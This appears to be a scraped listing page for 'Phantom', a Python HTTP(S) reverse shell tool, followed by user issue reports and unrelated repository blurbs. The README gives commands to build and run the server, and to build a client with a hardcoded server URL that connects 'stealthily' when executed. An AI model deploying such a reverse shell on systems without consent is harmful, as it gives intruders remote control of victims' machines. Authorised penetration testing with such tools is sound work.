A multi-platform HTTP(S) Reverse Shell Server and Client in Python 3

Last update: Nov 18, 2022

Overview

Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client

Phantom is a multi-platform HTTP(S) Reverse Shell server and client in Python 3. Binaries for Linux and Windows platforms can be built through an embedded script that executes PyInstaller.

Reverse shells can be established through HTTP or HTTPS. The certificates used for HTTPS can be auto-generated by Phantom or supplied by the user.

Phantom includes a helper shell script that enables fast generation of self-signed certificates for use of both servers and clients. After generation, the server and certificate authority certificates required for encrypted connections are bundled in the binaries for portability and ease of execution.

Demo

Try it out!

Simply head over to the dist directory and download the pre-built Linux/Unix or Windows binaries.

The HTTP client files are set to connect to http://localhost:8080, whereas the HTTPS client bundles a CA certificate file for https://localhost:4443 and will only connect to this socket. With that in mind, choose either HTTP or HTTPS and run the server on one shell:

./linux_server http://localhost:8080
            <-- or -->
./linux_server https://localhost:4443

And the client on another one...

./http_linux_client
     <-- or -->
./https_linux_client

The same procedure works for the Windows binaries.

Setup

HTTP Server and Client

You don't need to set up the server and client for HTTP connections. The server will work straight out-of-the-box and the client will connect to any HTTP server. Just download the HTTP binaries from dist and you're done. Execute the binaries with the --help option for instructions.

HTTPS Server and Client

Encrypted communication through HTTPS requires at least two certificates: One for the server, named server.pem by default, and another for the certificate authority, or ca.pem. Phantom bundles both files in binaries for fast deployment. They can be generated by multiple methods or by a simple execution of the generate_certs.sh helper script.

Once the certificates are ready you only need to follow the steps from the Build and Run section below.

Build and Run an HTTPS Server/Client

I. Install Dependencies

Dependency management works with both Poetry (recommended) and Virtualenv. You need to install all dependencies before building binaries.

git clone https://github.com/EONRaider/BCA-Phantom.git
cd BCA-Phantom
poetry install <--or--> pip install -r requirements.txt

II. Build HTTPS Server and Client binaries

The build.py file centralizes the process and takes care of it all. Notice that a built Client binary contains a hardcoded server URL. The connection to the server can be stealthily performed by simply executing the binary.

Build and run the Server

python build.py server --server-cert /path/to/server.pem
./linux_server SERVER_URL

Build and run the Client

python build.py client --url SERVER_URL --ca-cert /path/to/ca.pem
./https_linux_client

The same procedure works for the Windows binaries.

Legal Disclaimer

The use of code contained in this repository, either in part or in its totality, for engaging targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws.

Developers assume no liability and are not responsible for misuses or damages caused by any code contained in this repository in any event that, accidentally or otherwise, it comes to be utilized by a threat agent or unauthorized entity as a means to compromise the security, privacy, confidentiality, integrity, and/or availability of systems and their associated resources. In this context the term "compromise" is henceforth understood as the leverage of exploitation of known or unknown vulnerabilities present in said systems, including, but not limited to, the implementation of security controls, human- or electronically-enabled.

The use of this code is only endorsed by the developers in those circumstances directly related to educational environments or authorized penetration testing engagements whose declared purpose is that of finding and mitigating vulnerabilities in systems, limiting their exposure to compromises and exploits employed by malicious agents as defined in their respective threat models.

Reverse engineered connection to the TradingView ticker in Python

Tradingview-ticker Reverse engineered connection to the TradingView ticker in Python. Makes a websocket connection to the Tradeview website and receiv

20 Dec 2, 2022

A discord Server Bot made with Python, This bot helps people feel better by inspiring them with motivational quotes or by responding with a great message, also the users of the server can create custom messages by telling the bot with Commands.

A discord Server Bot made with Python, This bot helps people feel better by inspiring them with motivational quotes or by responding with a great message, also the users of the server can create custom messages by telling the bot with Commands.

1 Oct 13, 2021

Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode)

hbctool A command-line interface for disassembling and assembling the Hermes Bytecode. Since the React Native team created their own JavaScript engine

216 Jan 3, 2023

Info & tools for reverse engineering the M6 smart fitness band

m6-reveng This repo contains information and tools for reverse engineering the $7 M6 smart fitness band. Hardware The SoC (system-on-a-chip) is a Teli

41 Dec 26, 2022

My attempt to reverse the Discord nitro token generation function.

discord-theory-I PART: I My attempt to reverse the Discord nitro token generation function. The Nitro generation tools thing is common in Discord now,

29 Aug 14, 2022

A bot to get Statistics like the Playercount from your Minecraft-Server on your Discord-Server

Hey Thanks for reading me. Warning: My English is not the best I have programmed this bot to show me statistics about the player numbers and ping of m

12 Sep 24, 2022

This Server Cloner can clone the server you want with all the perms of roles in every particular channel.

Server-Cloner-with-perms 🚀 This Server Cloner can clone the server you want with all the perms of roles in every particular channel. Features Clone C

0 Feb 17, 2022

A Discord Server Cloner Which Can Clone Any Discord Server In Just Few Minutes

A Discord Server Cloner Which Can Clone Any Discord Server In Just Few Minutes.

4 Jul 23, 2022

WhatsApp Web API client with multi-device support

Tauros WhatsApp Web client for multi-device in python Free software: MIT Documentation: https://tauros.readthedocs.io Features TODO Credits This packa

0 Jan 20, 2022

Comments

Build Error
Hi !

First of all, thank you very much for this great tool !

I'm trying to build binary with self signed certs (made with your script). Unfortunately the build doesn't work and python return an error I don't understand.

$python build.py server --server-cert server-cert.pem Traceback (most recent call last): File "build.py", line 38, in <module> def server(args: argparse.Namespace) -> list[str]: TypeError: 'type' object is not subscriptable

Hope this question is not to stupid. Thanks in advance for your help.
opened by snax44 2
build error

[[email protected] BCA-Phantom]# python3 build.py server --server-cert /root/cert/server.pem Traceback (most recent call last): File "build.py", line 38, in def server(args: argparse.Namespace) -> list[str]: TypeError: 'type' object is not subscriptable

opened by ghost 0
issue with certificacion

I got this message in the client when I have to connect <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)>

` ./https_linux_client Traceback (most recent call last): File "urllib/request.py", line 1346, in do_open File "http/client.py", line 1279, in request File "http/client.py", line 1325, in _send_request File "http/client.py", line 1274, in endheaders File "http/client.py", line 1034, in _send_output File "http/client.py", line 974, in send File "http/client.py", line 1448, in connect File "ssl.py", line 500, in wrap_socket File "ssl.py", line 1040, in _create File "ssl.py", line 1309, in do_handshake ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "client.py", line 145, in File "client.py", line 84, in execute File "commands.py", line 38, in open_session File "commands.py", line 26, in _send File "client.py", line 78, in post File "urllib/request.py", line 214, in urlopen File "urllib/request.py", line 517, in open File "urllib/request.py", line 534, in _open File "urllib/request.py", line 494, in _call_chain File "urllib/request.py", line 1389, in https_open File "urllib/request.py", line 1349, in do_open urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:1129)> [3535] Failed to execute script 'client' due to unhandled exception!`

Both certificates were build with the generate_certs.sh

opened by rogerio77 0

Releases(v2.0.0)

v2.0.0(Nov 26, 2021)

Source code(tar.gz)
Source code(zip)
1.0.0(Nov 19, 2021)

Source code(tar.gz)
Source code(zip)

Owner

Computer programming. Cybersecurity.

GitHub Repository

Python3 based bittrex rest api wrapper

bittrex-rest-api This open source project was created to give an understanding of the Bittrex Rest API v1.1/v3.0 in pearl language. The sample file sh

4 Nov 15, 2022

Polars-fun - Example notebooks for how to use pola.rs

polars-fun Polars is an awesome Rust DataFrame library with Python language bindings. This repo makes it easy to run Polars code on your local machine

2 Jun 28, 2022

light wrapper for indeed.com api

Simple wrapper for indeed api. go to indeed.com - register for api publisher token example from indeed import IndeedApi token = 'your token' api =

16 Sep 21, 2022

This is a small package to interact with the OpenLigaDB API.

OpenLigaDB This is a small package to interact with the OpenLigaDB API. Installation Run the following to install: pip install openligadb Usage from o

1 Dec 31, 2021

A python API wrapper for temp-mail.org

temp-mail Python API Wrapper for temp-mail.ru service. Temp-mail is a service which lets you use anonymous emails for free. You can view full API spec

91 Nov 19, 2022

Auto Join: A GitHub action script to automatically invite everyone to the organization who comment at the issue page.

Auto Invite To Org By Issue Comment A GitHub action script to automatically invite everyone to the organization who comment at the issue page. What is

6 Jun 08, 2022

Linkvertise-bypass - Tools pour bypass les liens Linkvertise

Installation | Important | Discord 🌟 Comme Linkvertise bypass est gratuit, les

3 Aug 31, 2022

Cancel all your follow requests on Instagram.

Unrequester This python code unrequests all your follow requests on Instagram, using selenium. Everything's step-by-step and understanding it is like

3 Apr 09, 2022

Telegram bot for searching videos in your PDisk account by @AbirHasan2005

PDisk-Videos-Search A Telegram bot for searching videos in your PDisk account by @AbirHasan2005. Configs API_ID - Get from @TeleORG_Bot API_HASH - Get

39 Oct 21, 2022

Streaming Finance Data with AWS Lambda

A data pipeline consisting of an AWS lambda function reading data from yfinance API, an AWS Kinesis stream to receive & store data in S3 buckets and AWS Glue crawler & Athena to run SQL queries.

4 Aug 30, 2022

WhatsApp Multi Device Client

23 Nov 18, 2022

Trading strategy for the Freqtrade crypto bot

NostalgiaForInfinity Trading strategy for the Freqtrade crypto bot Change strategy Add strategies to the user_data/strategies folder and also in the d

1.5k Jan 01, 2023

Wrapper around the latest Tuenti API

python-tuenti Overview Wrapper around the latest Tuenti API. Installation Install using pip, including any optional packages you want... $ pip install

10 Mar 07, 2022

This repository is for active development of the Azure SDK for Python. For consumers of the SDK we recommend visiting our public developer docs at https://docs.microsoft.com/en-us/python/azure/ or our versioned developer docs at https://azure.github.io/azure-sdk-for-python.

Azure SDK for Python This repository is for active development of the Azure SDK for Python. For consumers of the SDK we recommend visiting our public

3.4k Jan 03, 2023

A multi-platform HTTP(S) Reverse Shell Server and Client in Python 3

Related tags

Overview

Phantom - A multi-platform HTTP(S) Reverse Shell Server and Client

Demo

Try it out!

Setup

HTTP Server and Client

HTTPS Server and Client

Build and Run an HTTPS Server/Client

I. Install Dependencies

II. Build HTTPS Server and Client binaries

Legal Disclaimer

You might also like...

Reverse engineered connection to the TradingView ticker in Python

A discord Server Bot made with Python, This bot helps people feel better by inspiring them with motivational quotes or by responding with a great message, also the users of the server can create custom messages by telling the bot with Commands.

Hermes Bytecode Reverse Engineering Tool (Assemble/Disassemble Hermes Bytecode)

Info & tools for reverse engineering the M6 smart fitness band

My attempt to reverse the Discord nitro token generation function.

A bot to get Statistics like the Playercount from your Minecraft-Server on your Discord-Server

This Server Cloner can clone the server you want with all the perms of roles in every particular channel.

A Discord Server Cloner Which Can Clone Any Discord Server In Just Few Minutes

WhatsApp Web API client with multi-device support

Comments

Build Error

build error

issue with certificacion

Releases(v2.0.0)

v2.0.0(Nov 26, 2021)

1.0.0(Nov 19, 2021)

Owner

Python3 based bittrex rest api wrapper

Polars-fun - Example notebooks for how to use pola.rs

light wrapper for indeed.com api

This is a small package to interact with the OpenLigaDB API.

A python API wrapper for temp-mail.org

Auto Join: A GitHub action script to automatically invite everyone to the organization who comment at the issue page.

Linkvertise-bypass - Tools pour bypass les liens Linkvertise

Cancel all your follow requests on Instagram.

Telegram bot for searching videos in your PDisk account by @AbirHasan2005

Streaming Finance Data with AWS Lambda

WhatsApp Multi Device Client

Trading strategy for the Freqtrade crypto bot

Wrapper around the latest Tuenti API

This repository is for active development of the Azure SDK for Python. For consumers of the SDK we recommend visiting our public developer docs at https://docs.microsoft.com/en-us/python/azure/ or our versioned developer docs at https://azure.github.io/azure-sdk-for-python.

Discord bot developed by Delhi University Student Community!

A Bot For Streaming Videos In Tg Voice Chats.

A Python AWS Lambda Webhook listener that generates a permanent URL when an asset is created in Contentstack.

Hostapd-mac-monitor - Setup a hostapd AP to conntrol the connections of specific MACs

Python Client for MLflow Tracking Server

Aria/qBittorrent Telegram mirror/leech bot